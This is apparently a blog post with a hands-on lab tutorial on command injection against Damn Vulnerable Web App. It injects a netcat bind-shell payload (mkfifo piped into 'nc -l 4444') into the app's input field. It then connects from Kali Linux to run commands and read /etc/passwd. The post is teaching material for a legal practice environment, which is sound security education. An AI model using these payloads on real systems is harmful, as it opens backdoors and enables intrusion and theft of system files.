Showing posts with label Damn Vulnerable Web App (DVWA). Show all posts
Showing posts with label Damn Vulnerable Web App (DVWA). Show all posts

Thursday, 26 March 2020

Damn Vulnerable Web App (DVWA) | Command Injection Attack using NetCat

In this post we are going to cover Command Injection Attack using NetCat on Damn Vulnerable Web App.

Background:
  • What is Damn Vulnerable Web App (DVWA)?
    • Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
    • Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
  • What is Command Execution?
    • Command Execution is where a website application provides the ability to execute system commands.
  • What is a Command Injection Attack?
    • The purpose of the command injection attack is to inject and execute commands specified by the attacker in the vulnerable application.
    • In situations like this, the application, which executes unwanted system commands, is like a pseudo system shell, and the attacker may use it
      as an authorized system user.
    • Note, the commands are executed with the same privileges as the application and/or web server.
    • Command injection attacks are possible in most cases because of lack of correct input data validation, which can be manipulated by the attacker (forms, cookies, HTTP headers etc.).
  • What is a Command Injection Listener Attack?
    • A Command Injection Listener Attack is where a malicious user creates a backdoor listener using common network utilities such as netcat.
    • Netcat is a computer networking service for reading from and writing to network connections using TCP or UDP.
      • Unix/Linux Example: 9.9.9.9;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
Lab:
1) Access DVWA application on your browser.

2) Click on Command Injection

3) Pass below data as argument in text box and lick on submit. 
192.168.43.118;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
  • Make a FIFO named pipe.
  • Pipes allow separate processes to communicate without having been designed explicitly to work together.
  • This will allow two processes to connect to netcat.
  • nc -l 4444, tells netcat to listen and allow connections on port 4444.
  • 192.168.43.118 is IP address of DVWA applciation.
4) Point 3 will open a back door to access DVWA machine. 

5) Now Login to your Kali Linux machine.

6) Now Use NetCat on Kali Linux to access DVWA instance.
  1. nc 192.168.43.209 4444
    • Use Kali Linux to Connect to DVWA Netcat session on port 4444
  2. hostname
    • This is server hostname that hosts DVWA.
  3. cat /etc/passwd
    • Show content of the /etc/passwd file


Like this we can perform any operation on DVWA instance from Kali Linux as long as we have NetCat session running on DVWA machine.